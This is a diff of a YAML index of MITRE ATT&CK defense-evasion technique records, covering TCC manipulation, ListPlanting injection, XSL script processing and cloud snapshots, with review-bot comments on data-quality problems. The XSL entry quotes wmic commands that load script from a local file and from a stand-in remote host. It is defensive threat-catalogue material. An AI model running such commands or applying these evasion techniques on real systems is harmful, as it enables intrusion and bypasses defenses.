description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -13110,8 +13417,8 @@ defense-evasion:
- source_name: 7 - appv
description: Nick Landers. (2017, August 8). Need a signed alternative to
Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
- Retrieved February 6, 2024.
- url: https://twitter.com/monoxgas/status/895045566090010624
+ Retrieved September 12, 2024.
+ url: https://x.com/monoxgas/status/895045566090010624
- source_name: 3 - appv
description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
Evasion (T1202). Retrieved February 6, 2024.'
@@ -13128,37 +13435,18 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
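Review bot: the removed `spec_version: '2.1'` line under `x_mitre_modified_by_ref` is the first of a whole series in this diff (the same line disappears from T1055.008, T1027.007, T1484, T1220, T1564.001, T1578.001, T1550.001, T1078.004, T1480.001 and T1564.004 below); if anything downstream re-emits these technique blocks as STIX 2.1 objects, `spec_version` is a required property there, so the PR description should say that the regeneration source no longer carries it and that no consumer reads it. Two smaller points on the rewritten `description`: the `|+` block scalar keeps the blank line before `kill_chain_phases` as part of the value, so the string now ends in two newlines where the old quoted form ended in one (`...permissions.\n"`), and plain `|` would avoid that; and the odd phrase "an overwrites file (if connected to an MDM)" is upstream ATT&CK wording (the object is MITRE-owned per `x_mitre_modified_by_ref`), so a grammar fix belongs in the source data, not in this index.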
@@ -13166,6 +13454,8 @@ defense-evasion:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -13173,7 +13463,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -13203,7 +13493,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -13249,7 +13538,7 @@ defense-evasion:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
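Review bot: `modified` for Ptrace System Calls moves backwards here, from `2022-04-25T14:00:00.188Z` to `2021-10-18T12:26:31.766Z`, and the same regression recurs below for Dynamic API Resolution (2022-11-08 to 2022-08-23), Hidden Files and Directories (2021-04-29 to 2020-03-29) and Environmental Keying (2022-05-24 to 2022-05-04). The old values share the `T14:00:00.188Z` shape of a bulk release stamp while the new ones look like per-object edit times, which suggests the regeneration read a different bundle than the previous run; please state the source bundle and its version in the PR description, and be aware that any tooling that diffs this index on `modified` to detect technique updates will see these as changes in the wrong direction.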
@@ -13294,8 +13583,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.007:
technique:
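Review bot: this hunk drops both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1055.008 with nothing added in their place, so this object ends up with no ATT&CK spec version at all, whereas the other objects touched in this diff keep the field (T1027.007 retains `x_mitre_attack_spec_version: 2.1.0`, and T1548.006, T1055.015, T1220 and T1578.001 carry `3.2.0`). Either every object should carry the field or none should; an object missing it will trip any consumer that keys behaviour on the ATT&CK spec version.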
@@ -13340,7 +13627,7 @@ defense-evasion:
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-08-23T18:32:46.899Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Obfuscated Files or Information: Dynamic API Resolution'
x_mitre_detection: ''
@@ -13354,58 +13641,28 @@ defense-evasion:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.007
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
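Review bot: almost all of the churn for T1055.015 is key reordering rather than content: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the whole `external_references` list are deleted here and re-added unchanged in the next hunk after `x_mitre_permissions_required`, so the real changes (the new `(Citation: Hexacorn Listplanting)` sentence and the new `modified`) are buried. The generator should serialise keys in one fixed order; note that it is not even self-consistent yet, since T1078.004 further down places `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` alphabetically among the other `x_mitre_*` keys while every other object in this diff leaves them at the end of the block.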
@@ -13422,6 +13679,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -13436,21 +13696,52 @@ defense-evasion:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -13495,9 +13786,8 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
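Review bot: this platform change removes `SaaS` from T1484 outright, not just the renamed `Azure AD`: the replacement list is `Windows` and `Identity Provider` only. The other platform updates in this diff (T1550.001 and T1078.004) keep `SaaS` and only fold `Azure AD` into `Identity Provider` and `Office 365`/`Google Workspace` into `Office Suite`, so please confirm the upstream object really dropped SaaS here rather than the generator losing it. Separately, because the platform strings themselves changed, any per-platform index or filter in this repository that still matches on `Azure AD`, `Office 365` or `Google Workspace` will silently stop selecting these techniques; check that those lists were regenerated from the new names in the same change.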
@@ -13554,8 +13844,8 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -13564,57 +13854,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1220:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Avneet Singh
- - Casey Smith
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
- created: '2018-10-17T00:14:20.652Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1220
- url: https://attack.mitre.org/techniques/T1220
- - source_name: Reaqta MSXSL Spearphishing MAR 2018
- url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
- description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
- MSXSL. Retrieved July 3, 2018.
- - source_name: Twitter SquiblyTwo Detection APR 2018
- url: https://twitter.com/dez_/status/986614411711442944
- description: Desimone, J. (2018, April 18). Status Update. Retrieved July
- 3, 2018.
- - source_name: LOLBAS Wmic
- url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
- description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
- - source_name: Microsoft msxsl.exe
- url: https://www.microsoft.com/download/details.aspx?id=21714
- description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
- Retrieved July 3, 2018.
- - source_name: Penetration Testing Lab MSXSL July 2017
- url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
- description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
- July 3, 2018.
- - source_name: XSL Bypass Mar 2019
- url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
- description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
- Proxy Code Execution. Retrieved August 2, 2019.
- - source_name: Microsoft XSLT Script Mar 2017
- url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
- description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
- Using . Retrieved July 3, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:12.337Z'
+ name: XSL Script Processing
description: |-
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
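Review bot: the `Microsoft XSLT Script Mar 2017` reference is removed here and re-added below with the same defect: its description reads `XSLT Stylesheet Scripting Using .`, with the object of "Using" missing before the full stop. The URL slug `xslt-stylesheet-scripting-using-msxsl-script` shows what belongs there, which points to the `msxsl:script` element name having been dropped as an HTML-like tag somewhere between the upstream citation and this file. Since the regeneration is the moment to fix it, either escape angle brackets in the generator or, if the text arrives already truncated, raise it upstream; the ListPlanting description above shows the same symptom around `SysListView32`, `FindWindow` and `EnumWindows`.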
@@ -13632,29 +13876,73 @@ defense-evasion:
* Local File: wmic process list /FORMAT:evil[.]xsl
* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XSL Script Processing
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Avneet Singh
+ - Casey Smith
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
- kill_chain_phases:
- - phase_name: defense-evasion
- kill_chain_name: mitre-attack
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- x_mitre_system_requirements:
- - Microsoft Core XML Services (MSXML) or access to wmic.exe
x_mitre_defense_bypassed:
- Anti-virus
- Digital Certificate Validation
- Application Control
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_system_requirements:
+ - Microsoft Core XML Services (MSXML) or access to wmic.exe
+ type: attack-pattern
+ id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+ created: '2018-10-17T00:14:20.652Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1220
+ external_id: T1220
+ - source_name: Reaqta MSXSL Spearphishing MAR 2018
+ description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+ MSXSL. Retrieved July 3, 2018.
+ url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+ - source_name: Twitter SquiblyTwo Detection APR 2018
+ description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+ 12, 2024.
+ url: https://x.com/dez_/status/986614411711442944
+ - source_name: LOLBAS Wmic
+ description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+ - source_name: Microsoft msxsl.exe
+ description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+ Retrieved July 3, 2018.
+ url: https://www.microsoft.com/download/details.aspx?id=21714
+ - source_name: Penetration Testing Lab MSXSL July 2017
+ description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+ July 3, 2018.
+ url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+ - source_name: XSL Bypass Mar 2019
+ description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+ Proxy Code Execution. Retrieved August 2, 2019.
+ url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+ - source_name: Microsoft XSLT Script Mar 2017
+ description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+ Using . Retrieved July 3, 2018.
+ url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1220
atomic_tests: []
T1564.001:
@@ -13687,7 +13975,7 @@ defense-evasion:
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
source_name: WireLurker
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T22:32:25.985Z'
name: 'Hide Artifacts: Hidden Files and Directories'
description: |-
Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a
for Windows and ls –a
for Linux and macOS).
@@ -13715,48 +14003,11 @@ defense-evasion:
- Host forensic analysis
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.001
atomic_tests: []
T1578.001:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
- type: attack-pattern
- created: '2020-06-09T15:33:13.563Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.001
- url: https://attack.mitre.org/techniques/T1578/001
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS Cloud Trail Backup API
- url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
- description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
- Retrieved April 27, 2020.
- - source_name: Azure - Monitor Logs
- url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
- description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
- Retrieved May 1, 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- - source_name: GCP - Creating and Starting a VM
- url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
- description: Google. (2020, April 23). Creating and Starting a VM instance.
- Retrieved May 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:53:44.870Z'
name: Create Snapshot
description: |-
An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -13765,6 +14016,9 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
@@ -13773,20 +14027,51 @@ defense-evasion:
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create
command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the "sourceSnapshot":
parameter pointed to "global/snapshots/[BOOT_SNAPSHOT_NAME]
.(Citation: GCP - Creating and Starting a VM)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Snapshot: Snapshot Creation'
- 'Snapshot: Snapshot Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+ created: '2020-06-09T15:33:13.563Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/001
+ external_id: T1578.001
+ - source_name: AWS Cloud Trail Backup API
+ description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+ Retrieved April 27, 2020.
+ url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+ - source_name: GCP - Creating and Starting a VM
+ description: Google. (2020, April 23). Creating and Starting a VM instance.
+ Retrieved May 1, 2020.
+ url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure - Monitor Logs
+ description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+ Retrieved May 1, 2020.
+ url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
